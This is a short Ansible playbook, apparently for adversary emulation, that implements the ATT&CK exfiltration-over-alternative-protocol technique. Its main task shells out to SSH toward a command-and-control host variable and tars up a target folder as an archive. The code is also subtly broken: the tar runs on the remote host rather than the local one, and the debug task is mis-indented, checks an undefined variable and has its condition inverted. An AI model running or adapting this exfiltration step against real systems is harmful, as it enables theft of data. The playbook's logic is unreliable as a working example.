# Playbook-T1048
- name : Exfiltration Over Alternative Protocol
  hosts: linux
  vars_files:
   - /opt/ansible/vars.yaml
  tasks:
    - name: Ansible check directory exists example.
      stat:
        path: "{{ exfiltration_folder }}"
      register: exfil_check
    - name: Exfiltration Over Alternative Protocol - SSH
      shell: |
        ssh {{ cnc_fqdn }} "(cd {{ exfiltration_folder }} && tar -zcvf - *) > ./{{ exfiltration_file }}.tar.gz"
      when: exfil_check.stat.exists
     - debug:
       msg: "Exfiltration folder does not exist"
       when: file_details.stat.exists

